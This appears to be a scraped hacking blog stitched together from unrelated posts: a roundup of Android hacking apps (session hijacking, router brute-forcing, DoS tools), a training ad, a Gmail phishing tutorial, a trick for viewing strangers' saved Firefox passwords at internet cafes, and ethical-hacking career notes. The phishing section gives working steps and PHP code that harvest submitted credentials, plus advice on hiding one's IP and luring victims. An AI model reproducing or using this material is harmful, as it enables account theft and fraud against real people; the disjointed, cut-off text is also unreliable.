Using DroidSheep is really simple
DroidSheeps main intention is to demonstrate how EASY it can be, to take over nearly any internet account. Using DroidSheep any user – even without technical experience –can check if his websession can be attacked or not. For these users it is hard to determine, if the data is sent using HTTPS or not, specially in case of using apps. DroidSheep makes it easy to check this.
Now days, smartphones and tablets are most the popular gadgets. If we see recent stats, global PC sale has also been decreasing for the past few months. The reason behind this is that people utilize tablets for most of their work. And there is no need to explain that Android is ruling global smartphone and tablet markets. Android is most popular mobile OS with more than 60% market share.
So, companies are now focusing on bringing their software as a mobile app for Android. These apps include office apps, photo editing apps, instant messaging apps and penetration testing apps. If you have an Android smartphone, you can start your next penetration testing project from your Android phone. There are few android apps that can turn your Android device into a hacking device. Although, these apps have so many limitations and can only be used for few specific tasks. You can never get the same experience as you get with your PC. But smaller jobs can be performed. Apps for penetration testers are not available widely, but hackers can enjoy this platform in a better way. There are many Wi-Fi hacking and sniffing apps available.
As we already said that Android is ruling smartphone and tablet markets, developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing for Android apps will need to have a penetration testing environment on your Android device.
Note:
1. These apps are not for beginners because expertise is needed on the Android platform. 2. Most of the apps work on Rooted Android devices. So root your Android device first. If you are not sure how to do it, learn how to by, reading one of the many sites available to help with this process. 3. You will lose your device’s warranty if you root it, so think twice before proceeding. 4. These apps can also harm your Android device. So please try these apps at your own risk.
In this detailed post, we will see various apps for web application penetration testing, network penetration testing, sniffing, networking hacking and Android apps penetration testing.
Android apps for Penetration testing
1. dSploit
dSploit is a nice Android network penetration testing suit. It comes with all-in-one network analysis capabilities. Like most of the other penetration testing tools, it also comes for free. So, you can download and use this app on your Android device and perform network security testing. It has various pre-complied modules to use. The app is designed to be very fast, handy and easy to use, it’s just point and click.
dSploit supports all Android devices running on Android 2.3 Gingerbread or higher, and you also need to root your device. If you are newbie, we will never recommend you to use the app if you don’t know how to root your Android device. After rooting your device, you need to install BusyBox Installer. Download BusyBox from Google Play Store: https://play.google.com/store/apps/details?id=com.jrummy.busybox.installer&hl=en
Then download the app from the link given below.
App is available on github: https://github.com/evilsocket/dsploit/downloads
These are the available modules in the app.
Want to learn more?? The InfoSec Institute Web Application Penetration Testing Boot Camp focuses on preparing you for the real world of Web App Pen Testing through extensive lab exercises, thought provoking lectures led by an expert instructor. We review of the entire body of knowledge as it pertains to web application pen testing through a high-energy seminar approach.
The Web Application Penetration Testing course from InfoSec Institute is a totally hands-on learning experience. From the first day to the last day, you will learn the ins and outs of Web App Pen Testing by attending thought provoking lectures led by an expert instructor. Every lecture is directly followed up by a comprehensive lab exercise (we also set up and provide lab workstations so you don't waste valuable class time installing tools and apps). Benefits to you are:
Get CWAPT Certified Learn the Secrets of Web App Pen Testing in a totally hands-on classroom environment Learn how to exploit and defend real-world web apps: not just silly sample code Complete the 83 Step "Web App Pen Test Methodology", and bring a copy back to work with you Learn how perform OWASP Top 10 Assessments: for PCI DSS compliance
VI EW WEB APP PEN TE ST
1. RouterPWN 2. Trace 3. Port Scanner 4. Inspector 5. Vulnerability Finder 6. Login Cracker 7. Packet Forger 8. MITM
2. Network Spoofer
Network Spoofer is another nice app that lets you change the website on other people’s computer from your Android phone. Download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app then tap on start. This app is considered as a malicious hacking tool by network administrators. So, don’t try on unauthorized networks. This is not a penetration testing app. It’s just to demonstrate how vulnerable the home network is.
Download this app from sourceforge http://sourceforge.net/projects/netspoof/
3. Network Discovery
Network Discovery is a free app for the Android device. The good thing is that the app doesn’t need a rooted device. This app has a simple and easy to use interface. It views all the networks and devices connected to your Wi-Fi network. The application identifies the OS and manufacturer of the device. Thus the app helps in information gathering on the connected Wi-Fi network.
Download app from Google Play: https://play.google.com/store/apps/details?id=info.lamatricexiste.network
4. Shark for Root
Shark for Root is a nice traffic sniffer app for the Android device. It works fine on 3G and Wi-Fi: both network connectivity options. You can see the dump on phone by using Shark Reader that comes with the app. You can also use Wireshark a similar tool to open the dump on the system. So, start sniffing data on your Android device and see what others are doing.
5. Penetrate Pro
Penetrate Pro is a nice Android app for Wi-Fi decoding. The latest version of the app has added many nice features. It can calculate the WEP/WAP keys for some wireless routers. If you have installed an Antivirus app, it may detect Penetrate Pro app as virus. But this app is a security tool and it will not affect or harm your device.
Penetrate gives you the wireless keys of Discus, Thomson, Infinitum, BBox, Orange, DMax, SpeedTouch, DLink, BigPond, O2Wireless and Eircom routers.
6. DroidSheep [Root]
DroidSheep is a session hijacking tool for Android devices. This is an app for security analysis in wireless networks. It can capture Facebook, Twitter, and LinkedIn, Gmail or other website accounts easily. You can hijack any active web account on your network with just a tap by using the DroidSheep app. It can hijack any web account.
This app demonstrates the harm of using any public Wi-Fi.
Download this app from here: http://droidsheep.de/?page_id=23
7. DroidSheep Guard
DroidSheep Guard is another Android app that also developed Droidsheep. This app does not require a rooted device. This app monitors Android devices’ ARP-table and tries to detect ARP-Spoofing attack on the network performed by DroidSheep, FaceNiff and other software.
Download DroidSheep Guard from Google Play: https://play.google.com/store/apps/details? id=de.trier.infsec.koch.droidsheep.guard.free&feature=search_result
8. WPScan
WpScan is the WordPress vulnerability scanner for Android devices. This nice app is used to scan a WordPress based website and find all the security vulnerabilities it has. WPScan also has a desktop version of the app that is much powerful than the Android app. We know that WordPress is one of the most popular CMS and is being used by millions of websites.
The Android version of the app comes with few nice features. The app was released on Google Play but Google removed the app. The full source code of the app is available from Github. One thing to note that WPScan Android app is not related to the desktop version of WPScan. So, never think it as an official WPScan app.
Download app and source code: https://github.com/clshack/WPScan
9. Nessus
Nessus is a popular penetration testing tool that is used to perform vulnerability scans with its client/server architecture. It also released its mobile app to bring its power on mobile devices. Nessus Android app can perform following tasks.
Connect to a Nessus server (4.2 or greater) Launch existing scans on the server Start, stop or pause running scans Create and execute new scans and scan templates View and filter reports
This app was released on Google Play store almost 2 years back by Tenable Network Security. Later Google removed the app from Play store. Now the official link has been removed. So you can try downloading links available on third party websites. But be careful and check the app first.
10. FaceNiff
FaceNiff is another nice sniffing app for Android devices. It requires a rooted Android device. It can sniff and intercept the web sessions over the Wi-Fi. This app is similar to DroidSheep, added earlier in the post. You can also say Firesheep for Android devices. Use of this app may be illegal in your area. So, use it wisely.
11. WebSecurify
WebSecurify is a powerful web vulnerability scanner. It’s available for all popular desktops and mobile platforms. It has a powerful crawler to crawl websites and then attack it using pre-defined patterns. We have already covered it in detail in our previous article. You can read the older article for better understanding.
Download it here: https://code.google.com/p/websecurify/
12. Network Mapper
Network Mapper is a fast scanner for network admins. It can easily scan your network and export the report as CVS to your Gmail. It lists all devices in your LAN along with details. Generally, the app is used to find Open ports of various servers like FTP servers, SSH servers, SMB servers etc. on your network. The tool works really fast and gives effective results.
Download Network Mapper for Google Play Store: https://play.google.com/store/apps/details? id=org.prowl.networkmapper&hl=en
13. Router Bruteforce ADS 2
If you are connected to a wi-Fi network and you want to access the router of the network, you can use Router Bruteforce ADS 2 app. This app performs Bruteforce attack to get the valid password of the router. It has a list of default passwords that it tries on the router. Most of the time, the app cracks the password. But you cannot be 100% sure in Bruteforce attack.
It comes with a sample txt file which contains 398 default passwords used in different routers. You can add more passwords in the list. But there is one limitation. This app only works with dictionary file of less than 5 MB. And try it only when you have good Wi-Fi signal. This is an experiment app and the developer also warns users to try at own risk.
Download Router Bruteforce ADS 2 from Google Play: https://play.google.com/store/apps/details?id=evz.android.rbf_ads&hl=en
14. Andosid
AnDOSid is another nice application that can be used to perform DOS attacks from Android mobile phones. It is like LOIC tool for desktop. In the app, you can set target URL, payload size and time difference between two requests. After that click on big GO button to launch DOS attack on a website. It will start flooding target URL with fake request. Use this app if you have a powerful device. Avoid if you have low cost entry level device.
15. AppUse – Android Pentest Platform Unified Standalone Environment
AppUse Virtual Machine is developed by AppSec Labs. It’s a freely available mobile application security testing platform for Android apps. This android penetration testing platform contains custom made tools by AppSec Labs.
This penetration testing platform is for those who are going to start penetration testing of Android applications. All you need is to download the AppUse Virtual Machine and then load the app for testing. The app comes with most of the configuration. So, you do not need to install simulators, testing tools, no need for SSL certifications of Proxy. Thus, the tool gives ideal user experience. In other words, you can say that AppUse Virtual Machine is Backtrack for Android apps. As we know that world is moving towards apps, AppUse VM has a good scope in future. We see how Android users face attacks and these cyber-attacks are growing. So, it is important for all Android app developers to test their apps for various kinds of vulnerabilities.
Download AppUse Virtual machine Here http://sourceforge.net/projects/appuse-android-pentest/files/AppUse%201.6_release.rar/download
Conclusion
Android is one of the fastest growing mobile platforms with the biggest market share. People also claim that it could replace desktop OS as well. Although we do not agree with that but, we cannot ignore the importance of it. This is why developers are bringing their tools for Android platforms also. In this post, I have listed few Android apps for hackers and security researchers. You can say that these apps are not as powerful as desktop hacking tools. But you can still enjoy these hacking tools for most of your tasks. Most of the hacking apps are related to networking and spoofing. All these apps do this task on Wi-Fi. Few web scanners are also available that lets security researchers find vulnerability on web applications.
You can also launch DOS attack on a website direct from your smartphone or tablet. This could be a better hacking tool.
If you are into the security field, you can try these apps and see how these work.
HOW TO CREATE A PHINSHING OR FAKE WEBPAGE FOR GMAIL
This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.
Steps for Creating Phishing or Fake web Page:
Step 1:
Go to the gmail.com. Save the Page as "complet HTML" file
Step 2: Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"
Step3: Upload those image to tinypic or photobucker.com. copy the url of each image.
Step4: Open the HTML file in Wordpad. Search for "google_transparent.gif" (without quotes) and replace it with corresponding url . Search for "mail_logo.png" (without quotes) and replace it with corresponding url .
Step 5: Search for the
action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php"
save the file. Step6: Now you need to create login.php so you need to open the notepad and type as <?php header("Location: https://www.google.com/accounts/ServiceLoginAuth "); $handle = fopen("pswrds.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> save it
Step 7: open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site. Note: that web hosting service must has php feature. Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 8: create an email with gmail keyword. like : gmailburger@gmail.com
Step 9: Send to victim similar to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.
Note: For user to believe change Your phishing web page url with any of free short url sites. Like : co.nr, co.cc,cz.cc This will make users to believe that it is
Here is simple hacking tutorial to view the saved passwords in Mozilla firefox. While visiting public internet cafe ,some innocent peoples click the "Remember" while mozilla asking for remembering. This is one of the benefit for us to hack their account in very simple way.
Follow these steps to see the saved Passwords:
click the "Tools" menu in menu bar. Select Options It will open a small window Select the "security" tab in that small window You can view "saved Passwords" button
Click that button. It will another small window There will be list of sites with usernames Select One site and click the "show Password" It will clearly show you the password
I have been asked for tips to become Ethical Hacker or Penetration tester via email. So In this article, i am going to guide you to get into the Penetration Testing world.
If you are seeing this article, then it means that you already heard about Ethical Hacking and PenTesting. Anyway, i just like to give small definition about Ethical hacking.
What is Ethical Hacking and Ethical Hacker?
Ethical Hacking, also known as Penetration testing, is the process of vulnerability testing or hacking the system with a permission from corresponding vendor. Normally, organization who are in the need of security recruits Ethical Hacker or PenTester for improving their security.
Ok, let us come to the article.
1. Dedication : Dedication is the main key to become an ethical hacker. Don't plan to become pentester because of money. If you really have interest, then go ahead. 2. Reading : Be a bookworm. Try to read books related to computer and its architecture. Buy books related to Security and Ethical hacking.
3. Know how hackers hack into: You can not solve the problem until you know what is behind the problem. So you have to learn method of hackers. How ??! Just read the articles provided in our site.
4. Programming and Scripting: Learn Some programming or scripting languages because most of time you will need to write a code to break into a system. Also, you have to know the coding for understanding how a system works,then only you can penetrate into. Ok, which language?! My suggestion is C. I Love C programming. It is one of best,powerful language and easy to learn. Some peoples prefer python. As far as i am concerned, once you learned one language, it is easy for you to learn any other languages. There are are plenty of online programming tutorial sites are out there.
5. Linux: Ok, it is time to switch from Windows to Linux. Learn to work with Linux.
6. BackTrack Linux Distribution: Backtrack Linux is one of the famous Penetration Testing Linux distribution. This backtrack is funded by Offensive Security. It has almost all penetration testing tools required for security professionals.
7. Get Certification for Ethical Hackers: Some organization recruits based on security certification. You can learn and get ethical certification from your nearest center. Search in google for these keywords "CEH","OSCP","security certifications". Anyway, if you have dedication and confidence, you don't need a certificate and get into a firm easily. 8. Vercetti's blog: In my, i have written plenty of articles related to Ethical hacking and penetration testing. Hope it will help you to get some knowledge. Also, you can find the latest ethical hacking techniques in my blog
9. Forums: Participate in any Security or ethical Hacking related forums.
10. Need help?! feel free to contact me
Opportunities for Ethical Hacker There are plenty of jobs available in government organisations, banks, financial institutions, military establishments and private companies. India requires more Ethical Hackers.
What is computer hacking?
In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking.
Now a days, People started thinking that hacking is only hijacking Facebook accounts or defacing websites. Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking.
So what is exactly hacking, what should i do to become a hacker?! Don't worry, you will learn it from Vercetti's blog. The main thing you need to become a hacker is self-interest. You should always ready to learn something and learn to create something new.
Now , let me explain about different kind of hackers in the cyber security world.
SCRIPT KIDDIES
Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers. In a simple word, the one who doesn't know how a system works but still able to exploit it with previously available tools.
White Hat Hacker: White Hat hackers are good guys who does the hacking for defensing. The main aim of a Whitehat hacker is to improve the security of a system by finding security flaws and fixing it. They work for an organization or individually to make the cyber space more secure.
Vercetti's blog only concentrates on white-hat hacking and help you to learn the Ethical Hacking world.
BLACKHAT HACKER
BlackHat hackers are bad guys , cyber criminals , who have malicious intent. The hackers who steal money, infect systems with malware ,etc are referred as BlackHat hackers. They use their hacking skills for illegal purpose
GREYHAT HACKERS
The hackers who may work offensively or defensively, depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.
HACKTIVISTS
The hackers who use their hacking skills for protesting against injustice and attack a target system and websites to bring the justice. One of the popular hacktivists is Anonymous.
